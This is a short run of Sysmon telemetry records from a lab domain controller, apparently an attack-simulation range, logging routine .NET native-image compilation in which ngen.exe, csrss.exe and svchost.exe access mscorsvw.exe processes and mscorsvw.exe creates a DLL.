{"EventTime":"2020-08-01 06:00:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7950,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:21.481\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04F5-5F25-0000-0010403F1200}\r\nTargetProcessId: 1552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:21.481","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04F5-5F25-0000-0010403F1200}","TargetProcessId":"1552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7951,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:21.481\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04F5-5F25-0000-0010403F1200}\r\nTargetProcessId: 1552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:21.481","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04F5-5F25-0000-0010403F1200}","TargetProcessId":"1552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7952,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:21.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04F5-5F25-0000-0010403F1200}\r\nTargetProcessId: 1552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:21.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04F5-5F25-0000-0010403F1200}","TargetProcessId":"1552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7953,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:24.575\r\nProcessGuid: {A837DB8D-04F5-5F25-0000-0010403F1200}\r\nProcessId: 1552\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\610-0\\System.Workflow.ComponentModel.dll\r\nCreationUtcTime: 2020-08-01 06:00:24.575","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:24.575","ProcessGuid":"{A837DB8D-04F5-5F25-0000-0010403F1200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\610-0\\System.Workflow.ComponentModel.dll","CreationUtcTime":"2020-08-01 06:00:24.575","EventReceivedTime":"2020-08-01 06:00:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7954,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:24.684\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04BC-5F25-0000-0010E2481000}\r\nTargetProcessId: 2936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:24.684","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04BC-5F25-0000-0010E2481000}","TargetProcessId":"2936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7955,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:24.684\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04BC-5F25-0000-0010E2481000}\r\nTargetProcessId: 2936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:24.684","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04BC-5F25-0000-0010E2481000}","TargetProcessId":"2936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7956,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:24.684\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04BC-5F25-0000-0010E2481000}\r\nTargetProcessId: 2936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:24.684","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04BC-5F25-0000-0010E2481000}","TargetProcessId":"2936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7957,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:24.762\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-001052101100}\r\nTargetProcessId: 4320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:24.762","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-001052101100}","TargetProcessId":"4320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7958,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:24.762\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-001052101100}\r\nTargetProcessId: 4320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:24.762","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-001052101100}","TargetProcessId":"4320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
